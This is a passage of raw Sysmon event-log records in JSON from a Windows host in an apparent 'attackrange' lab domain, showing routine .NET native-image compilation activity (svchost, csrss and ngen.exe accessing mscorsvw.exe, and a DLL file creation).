ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.897","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-001032BB1000}","TargetProcessId":"3936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8224,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:16.162\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B4-5F25-0000-001071BF1000}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:16.162","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B4-5F25-0000-001071BF1000}","TargetProcessId":"4624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8225,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:16.162\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B4-5F25-0000-001071BF1000}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:16.162","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B4-5F25-0000-001071BF1000}","TargetProcessId":"4624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8226,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:16.178\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B4-5F25-0000-001071BF1000}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:16.178","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B4-5F25-0000-001071BF1000}","TargetProcessId":"4624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8227,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:18.115\r\nProcessGuid: {41C8662E-22B4-5F25-0000-001071BF1000}\r\nProcessId: 4624\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1210-0\\System.Workflow.Activities.dll\r\nCreationUtcTime: 2020-08-01 08:07:18.115","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:18.115","ProcessGuid":"{41C8662E-22B4-5F25-0000-001071BF1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1210-0\\System.Workflow.Activities.dll","CreationUtcTime":"2020-08-01 08:07:18.115","EventReceivedTime":"2020-08-01 08:07:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8228,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:18.193\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B6-5F25-0000-001024C51000}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:18.193","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B6-5F25-0000-001024C51000}","TargetProcessId":"4948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8229,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:18.193\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B6-5F25-0000-001024C51000}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:18.193","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B6-5F25-0000-001024C51000}","TargetProcessId":"4948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8230,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:18.209\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B6-5F25-0000-001024C51000}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:18.209","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B6-5F25-0000-001024C51000}","TargetProcessId":"4948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8231,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:18.303\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227E-5F25-0000-0010FDD30E00}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:18.303","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227E-5F25-0000-0010FDD30E00}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8232,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:18.303\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227E-5F25-0000-0010FDD30E00}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 